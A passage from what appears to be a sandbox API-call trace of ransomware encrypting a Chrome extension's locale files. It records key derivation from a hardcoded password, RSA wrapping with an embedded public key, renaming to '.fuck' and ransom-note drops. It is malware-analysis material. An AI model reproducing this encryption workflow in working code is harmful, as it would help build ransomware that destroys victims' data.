[0252.037] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.037] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.037] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.037] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.037] GetLastError () returned 0x0 [0252.037] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json")) returned 0x20 [0252.038] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0252.039] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.039] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.040] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.041] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.043] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.043] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.044] CryptHashData (hHash=0x29844e0, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.044] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29844e0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984120) returned 1 [0252.044] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.044] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.044] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b140) returned 1 [0252.044] CryptImportPublicKeyInfo (in: hCryptProv=0x298b140, dwCertEncodingType=0x1, pInfo=0x2991a70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991aa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991aa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29843e0) returned 1 [0252.044] CryptEncrypt (in: hKey=0x29843e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.044] CryptEncrypt (in: hKey=0x29843e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a8c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a8c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.045] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298a8c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a8c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.046] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.047] CryptEncrypt (in: hKey=0x2984120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.047] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.047] CloseHandle (hObject=0x5d64) returned 1 [0252.047] CloseHandle (hObject=0x5d5c) returned 1 [0252.047] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0252.051] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0252.051] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0252.052] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0252.053] CryptDestroyHash (hHash=0x29844e0) returned 1 [0252.053] CryptDestroyKey (hKey=0x2984120) returned 1 [0252.053] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.054] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.054] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.054] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0252.054] AreFileApisANSI () returned 1 [0252.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.054] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.054] GetFileType (hFile=0x5d60) returned 0x1 [0252.055] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.056] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.056] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.056] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.056] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.056] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.057] GetLastError () returned 0x0 [0252.057] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json")) returned 0x20 [0252.057] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0252.058] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.059] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.059] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.060] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.062] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.062] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.062] CryptHashData (hHash=0x2984760, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.062] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984760, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29846a0) returned 1 [0252.062] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.062] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.062] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298a6a0) returned 1 [0252.062] CryptImportPublicKeyInfo (in: hCryptProv=0x298a6a0, dwCertEncodingType=0x1, pInfo=0x2991c10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991c40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991c48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984120) returned 1 [0252.062] CryptEncrypt (in: hKey=0x2984120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.063] CryptEncrypt (in: hKey=0x2984120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b470*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b470*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.063] WriteFile (in: hFile=0x5d64, lpBuffer=0x298b470*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b470*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.064] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.066] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.066] CloseHandle (hObject=0x5d5c) returned 1 [0252.066] CloseHandle (hObject=0x5d64) returned 1 [0252.066] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0252.070] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0252.070] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.gsg")) returned 1 [0252.072] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.fuck")) returned 1 [0252.074] CryptDestroyHash (hHash=0x2984760) returned 1 [0252.074] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.074] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.074] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.074] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.074] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0252.074] AreFileApisANSI () returned 1 [0252.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.074] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.075] GetFileType (hFile=0x5d60) returned 0x1 [0252.075] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.076] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.076] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.076] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.076] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.076] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.077] GetLastError () returned 0x0 [0252.077] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json")) returned 0x20 [0252.078] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0252.078] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.079] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.080] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.080] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.083] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.083] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.083] CryptHashData (hHash=0x29844e0, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.083] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29844e0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29846a0) returned 1 [0252.083] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 